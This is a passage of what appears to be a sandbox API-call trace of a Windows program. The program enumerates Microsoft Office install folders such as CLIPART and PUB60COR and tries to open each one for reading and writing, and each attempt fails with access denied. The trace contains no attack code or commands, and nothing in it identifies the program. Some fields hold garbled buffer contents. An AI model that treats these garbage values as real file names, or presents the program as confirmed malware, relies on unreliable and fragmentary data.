hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0100.218] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0100.218] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0100.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0100.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0100.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0100.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0100.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0100.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0100.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0100.219] AreFileApisANSI () returned 1 [0100.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0100.219] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e360 [0100.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e360, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\vcruntime140.dll") returned 63 [0100.219] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\vcruntime140.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\vcruntime140.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2424784, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2424784, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd26acf16, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0)) returned 1 [0100.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0100.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.219] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0100.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.219] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.219] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x7c, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x82210, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x7c, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\c", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓媰\x01⺊Āgr먤聤̓㑍Ā̓蛐\x07̓뻌聤媰\x01媰\x01 Office\\root\\client\\vcruntime140.dll")) returned 0 [0100.219] FindClose (in: hFindFile=0x786d0 | out: hFindFile=0x786d0) returned 1 [0100.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0100.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0100.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0100.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0100.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0100.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.220] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0100.220] AreFileApisANSI () returned 1 [0100.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART", lpUsedDefaultChar=0x0) returned 47 [0100.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0100.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.220] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.220] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0100.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.221] AreFileApisANSI () returned 1 [0100.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0100.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0100.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART") returned 47 [0100.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART" (normalized: "c:\\program files\\microsoft office\\root\\clipart"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.221] GetLastError () returned 0x5 [0100.221] GetLastError () returned 0x5 [0100.221] SetLastError (dwErrCode=0x5) [0100.221] GetLastError () returned 0x5 [0100.221] SetLastError (dwErrCode=0x5) [0100.221] GetLastError () returned 0x5 [0100.221] SetLastError (dwErrCode=0x5) [0100.221] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0100.221] AreFileApisANSI () returned 1 [0100.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0100.221] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0100.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART") returned 47 [0100.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART" (normalized: "c:\\program files\\microsoft office\\root\\clipart"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.221] GetLastError () returned 0x5 [0100.222] GetLastError () returned 0x5 [0100.222] SetLastError (dwErrCode=0x5) [0100.222] GetLastError () returned 0x5 [0100.222] SetLastError (dwErrCode=0x5) [0100.222] GetLastError () returned 0x5 [0100.222] SetLastError (dwErrCode=0x5) [0100.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0100.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0100.222] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.222] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.222] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.222] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0100.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0100.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0100.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0100.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0100.222] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Document Themes 16", cAlternateFileName="DOCUME~1")) returned 1 [0100.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0100.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0100.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0100.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0100.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0100.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0100.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0100.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0100.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0100.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0100.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0100.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0100.222] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0100.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ace8 [0100.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0100.223] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78110 [0100.224] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.224] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1113bba3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB60COR", cAlternateFileName="")) returned 1 [0100.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0100.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0100.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0100.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0100.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0100.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0100.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0100.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0100.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0100.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0100.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.225] AreFileApisANSI () returned 1 [0100.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR", lpUsedDefaultChar=0x0) returned 56 [0100.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0100.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0100.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.225] AreFileApisANSI () returned 1 [0100.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0100.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0100.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR") returned 56 [0100.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.226] GetLastError () returned 0x5 [0100.226] GetLastError () returned 0x5 [0100.226] SetLastError (dwErrCode=0x5) [0100.226] GetLastError () returned 0x5 [0100.226] SetLastError (dwErrCode=0x5) [0100.226] GetLastError () returned 0x5 [0100.226] SetLastError (dwErrCode=0x5) [0100.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0100.226] AreFileApisANSI () returned 1 [0100.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0100.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0100.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR") returned 56 [0100.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.226] GetLastError () returned 0x5 [0100.226] GetLastError () returned 0x5 [0100.226] SetLastError (dwErrCode=0x5) [0100.226] GetLastError () returned 0x5 [0100.226] SetLastError (dwErrCode=0x5) [0100.226] GetLastError () returned 0x5 [0100.226] SetLastError (dwErrCode=0x5) [0100.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0100.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0100.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0100.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0100.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8af48 [0100.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0100.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0100.227] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0100.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.227] RtlAllocateHeap (HeapHandle=0x20000, 